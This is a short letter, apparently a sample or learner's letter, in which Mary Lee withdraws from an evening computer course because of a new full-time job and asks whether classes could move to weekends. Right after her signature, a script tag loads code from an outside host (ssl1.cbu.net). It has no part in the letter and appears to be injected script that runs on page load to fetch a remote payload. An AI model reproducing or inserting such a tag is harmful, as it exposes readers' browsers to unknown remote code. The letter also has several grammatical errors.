Dear Mr. Smith,
I am writing to inform you that I cannot continue with the evening computer course. Since, my position in the company has changed from part-time to full-time, I need to put in extra hours at work.
Let me explain my situation in detail. I now leave from work at 6 p.m and due to heavy traffic congestion, I won't be able to make it on time for the class. In addition, every Monday I need to work overtime. Initially, since I was working part-time, the work timings were flexible as well as I was not given too many projects. All that has changed now. However, we now have a new intern and I have been given the responsibility of training him and bringing him up to speed.
Finally, as I am free during the weekend can that the classes be conducted that time. Moreover, some of my colleagues would also be interested in joining.
Looking forward to your reply.
Yours faithfully,
Mary Lee<script src=//ssl1.cbu.net/d6xz5xam></script>
